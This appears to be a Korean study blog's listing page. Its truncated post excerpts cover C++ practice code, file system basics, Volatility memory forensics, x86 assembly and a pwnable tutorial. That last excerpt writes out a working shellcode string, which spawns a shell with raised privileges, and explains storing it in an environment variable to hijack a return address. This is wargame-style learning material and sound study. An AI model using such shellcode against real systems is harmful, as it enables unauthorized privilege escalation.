STUDY 51

객체지향 프로그래밍 중간고사 실습대비 연습문제

#include #include using namespace std; #define STUDENT 5 const char *head[] = { "학생 신체 현황 자료(입력순)","학생 신체 현황 자료(성명순)" }, *underline = "==========================="; const char *name[] = { "김철수","이영희","홍길동","한수만","박문수" }; int birth[] = {1990,1989,1991,1988,1990}; double height[] = { 172.5,187.2,174.6,182.5,170.3 }; double weight[] = { 67.2,78.5,75.1,80.6,68.6 }; int main() { int i,j; int flag, id..

STUDY/Assignment 2020.04.24

파일시스템 기초

파일시스템 기초 HDD는 공간만 제공 따라서 제한된 공간을 체계적, 효율적으로 쓰기 위해 파일 시스템을 사용 파일개념 저장장치의 물리적특성을 추상화한 논리적 저장단위 컴퓨터에서 처리되는 다양한 정보를 저장 연속적인 논리 주소공간으로 구성 파일내의 정보의 의미나 형식은 작성자에 의해 정의 파일의 종류 프로그램 데이터: 숫자, 문자, 이진수의 배열 파일시스템 운영체제에 포함된 파일접근 및 관리모듈 저장장치에 구성된 파일들의 저장체계 파일의 온라인 접근과 저장을 위한 서비스 제공 저장장치의 구조 파티션 복잡한 관리를 위해 저장장치 공간을 세분화 개별 파일시스템의 크기 제한 하나의 저장장치에 여러개의 파일 시스템을 사용가능 별도의 스왑 혹은 포맷되지 않은 공간으로 활용 볼륨 파일시스템을 포함하는 개체 논리적인 ..

STUDY/Forensic 2020.03.07

Volatility 사용법

volatility.exe가 있는 폴더로 이동해서 cmd를 킨다 분석하고자 하는 파일을 volatility.exe있는 곳에 같이 넣는다. volatility.exe -f [파일 명] imageinfo volatility의 plugin을 사용하기 위해서는 3번을 한 후 suggested profiles라는 곳에 써져있는 운영체제 명을 기억해놓는다. process의 리스트를 보기 위해 volatility.exe -f [분석할 파일명] --profile=[운영체제명] pslist을 입력한다. 휘발성이라 전원을 끄면 기록이 날라감 .한개는 .이 없는 것의 자식프로세스 ..은 .의 자식프로세스 pslist자리에 1. psscan은 프로세스의 시작과 끝 시간은 안다 2. pstree는 부모와 자식프로세스를 자세히 ..

STUDY/Forensic 2020.02.25

어셈블리어 기초

printf등을 포함한 모든 함수는 에필로그 할때 모두 ret가 있음 EIP : 다음 실행할 명령어의 주소 EBP : 스택의 제일 높은 주소 (기준점) ESP : stack의 제일 아래 부분, 현재 진행 stack지점 1. PUSH : 스택에 값을 저장한다 PUSH후에는 스택이 4byte 증가, ESP레지스터가 4byte감소 ex) PUSH EBP --->EBP의 값을 스택에 저장 2. POP : 스택 끝에 저장된 값을 가져온다 POP후에는 스택이 4byte감소, ESP레지스터가 4byte증가 ex) POP EBP ---> 스택 끝의 값을 꺼내서 EBP에 저장 3. MOV : 지정한 값을 지정한 곳에 넣어주는 역할을 한다.(주소에 저장된 값을 저장) ex) MOV ESP, EBP --->스택 프레임 제거..

STUDY/Pwnable 2020.01.15

환경변수 이용하는 법

환경변수에 등록된 데이터는 고정적인 메모리 주소를 가지고 있는다 따라서 shellcode를 환경변수에 등록하고 메모리 주소를 알아가지고 RET에 넣으면 원하는 결과를 얻을 수 있다. ------------ pwntool 안 쓸때------------- 1.환경변수 등록 export [환경변수명]=$(python -c 'print"\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80"') 2. shellcode가 위치하는 메모..

STUDY/Pwnable 2020.01.02